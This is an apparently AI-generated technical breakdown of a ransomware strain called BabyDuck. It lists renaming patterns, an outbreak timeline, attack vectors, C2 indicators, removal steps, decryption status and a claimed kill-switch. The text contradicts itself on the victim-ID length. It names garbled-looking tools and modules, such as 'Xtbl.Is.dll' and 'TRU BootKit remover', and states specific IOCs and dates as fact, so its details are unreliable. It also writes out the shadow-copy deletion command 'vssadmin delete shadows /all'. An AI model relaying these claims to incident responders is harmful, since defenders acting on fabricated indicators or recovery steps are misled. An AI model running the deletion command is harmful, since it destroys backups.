babyduck

[Content by Gemini 2.5]

Technical Breakdown – BabyDuck Ransomware (a.k.a. “.babyduck”)

1. File Extension & Renaming Patterns

Confirmation of File Extension: .babyduck (lowercase, no uppercase variations observed to date).
Renaming Convention:
<original_filename>.<original_extension>.<16-hex-byte_ID>.babyduck
Example:
QuarterlyReport.xlsx.dfa8ba5c4367f01b.babyduck

The 32-character hex segment is unique per victim and appears to be the truncated SHA-256 of the victim host SID + MAC, which is also used as the affiliate ID during Bitcoin wallet derivation.

2. Detection & Outbreak Timeline

  • First AV detection on public samples: 16 July 2023 (submitted to VirusTotal by a North-American MSP).
  • Wild-campaign start: 19 July 2023 (massive spike in id-ransomware uploads; first corporate confession on Reddit on 20 July).
  • Peak activity: July–September 2023 with later waves in December 2023 and February 2024 (“DucklingWave” bundles).
  • Current status: Still circulating via malvertising and RaaS affiliate kits (Q2-2024 signatures).

3. Primary Attack Vectors

| Vector | Detail |
|—|—|
| Phishing e-mails | ISO, IMG or password-protected ZIP containing a .lnk → mshta pulling stage-1 HTA from b3f4bathsry.top. |
| EternalBlue (MS17-010) | Post-breach for lateral movement; the loader (spoolsvc.exe) drops BabyDuck dll sl.dll via Wannamine-style reflective load. |
| RDP brute-force & Credential-stuffing | Attacks port 3389. Successfully-combined extortion notices reference ‘RDP compromise’. |
| **Accessory malware: BatLoader + ** IcedID Throwable | Seen in late-stage infections – BatLoader chains BabyDuck immediately after initial banking-trojan foothold. |
| Software vulnerability | exploitation of manage-engine ServicesDesk Plus CVE-2021-44515 (early 12/2023 surge). |

Remediation & Recovery Strategies

1. Prevention

  • Patch systemically: MS17-010 (disable SMBv1 group policy), CVE-2021-34527 (“PrintNightmare”), Exchange Proxy-Logon patches if reachable.
  • Email-gateway: Strip ISO/IMG archives, ban HTA, VBS, JAR at mail ingress.
  • Conditional-access MFA on VPN/RDP, GeoIP whitelisting, zero-password-caching for RDP.
  • EDR rules: Block spawn of powershell.exeregsvr32.exe, or powershell.exerundll32.exe with sl.dll.
  • Application control: GPO-based Software Restriction Policy preventing execution under %APPDATA%\7d17*.exe.
  • Backup cadence: Immutable backups (air-gapped or object-lock cloud) with at least 3-2-1 protection, daily test restores.

2. Removal – Full-kill-chain sanitation

  1. Isolate: Immediately firewall the host(s); block known C2 IP ranges:
  • 144.208.100[.]12
  • 104.193.252[.]47
  • f043[.]duck[.]army (DGA seed updated every 5 days).
  1. Boot into Safe Mode or WinRE.
  2. Stop parents: Tasklist → Kill cmd.exe & mshta.exe that initiated infection.
  3. Remove persistence:
    HKCU\Software\Microsoft\Windows\CurrentVersion\Run\FxRate
    C:\Users\<user>\AppData\Roaming\7d17\spoolsvc.exe
    ScheduledTask DuckTray under \Microsoft\Office.
  4. Scan & clean:
  • Run Microsoft Defender Offline Sig v1.385.757+.
  • Use ESET Emergency Disk or TRU BootKit remover to quarantine Xtbl.Is.dll (worm module).
  1. Hunt shadow copies: Verify vssadmin list shadows – if deleted, proceed directly to recovery.
  2. Verify lateral spread: Use BloodHound to confirm no residual PS-REMM/[SMBExec] footholds across domain.

3. File Decryption & Recovery

Current Status

As of 2024-05-01 NO private decryption key has been leaked, nor has a reliable third-party decryptor surfaced.
The AES-256-CFB key for each file is individually generated per file-header-encrypted, then wrapped by a 4096-bit RSA public key – offline brute-force is infeasible.

Available Avenues

  1. Check ID-Ransomware to see if you belong to a campaign whose keys were released (unlikely at this time).
  2. Post on BleepingComputer’s BabyDuck thread – occasionally affiliates bundle decryptors in their adverts after being paid in Bitcoin, and a leak may emerge.
  3. Restore from backup: Prioritise encrypted Veeam / Rubrik / Commvault images that exist from before the last modified timestamp of the cryptor (spoolsvc.exe execution).
  4. Volume Shadow Copy & WSB (using wmic to re-enable cmdlets):
    vssadmin restore shadow /shadow=”%shadowId%” /AutoRollback
    Only viable if not-deleted via vssadmin delete shadows /all.

4. Other Critical Information

  • Kill-switch: The sample hunts for %SystemDrive%\quack\stopduck.txt – placing the file zero-byte at root prevents encryption until removal.
  • Gimmick: Ransom note is in two files simultaneously:
  1. RECOVER_YOUR_FILES.txt (ANSI text).
  2. Background JPG (quack.jpg) dropped via GPO desktop wallpaper automatically.
  • RaaS Affiliation: Operated under “QuackServ” affiliate branding – tutorials & client area found on torbox3sukax.
  • Data-exfiltration channel: Utilises embedded Rclone binary (r64.exe) to AWS S3 or Mega.nz buckets named with the affiliate ID – turn on AWS GuardDuty for beaconing.
  • Regulatory note: Hospitals/PHI hit in Q4-2023 → OCR/U.S. Health-care breach notifications due explicitly due to data exfil.

Executive Summary

BabyDuck is an actively-maintained double-extortion strain. Defence leans on patching, multifunction EDR rules, and rigorous immutable backups. At the moment decryption is impossible; therefore rapid recovery orchestration and validated backups remain the sole practical resilience against this threat.